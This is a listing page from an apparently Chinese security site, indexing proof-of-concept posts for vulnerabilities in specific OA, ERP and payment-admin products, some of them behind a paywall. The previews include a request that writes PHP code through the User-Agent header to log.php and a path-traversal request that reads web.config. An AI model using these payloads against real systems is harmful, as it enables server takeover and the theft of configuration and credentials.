秃兔安全_最新发布

【通用】泛微e-office index.php sql注入漏洞

fofayakit插件 uuidpocyaml已验证

dreamer2927个月前

09210

泛微ecology系统setup接口存在信息泄露漏洞

POC 2024你懂的

秃兔11个月前

0926

金和OA C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞

POC 2024你懂的

秃兔11个月前

09214

【通用】协众OA系统接口checkLoginQrCode SQL注入漏洞

fofa语句yakit插件uuidpocyakit && nuclei yaml已验证

付费阅读500 Nuclei插件 POC poc_yaml # poc # yakit # nuclei

dreamer29211个月前

0927

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

付费阅读500 POC # poc

dreamer2922个月前

0927

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...

POC 2024你懂的

秃兔11个月前

0926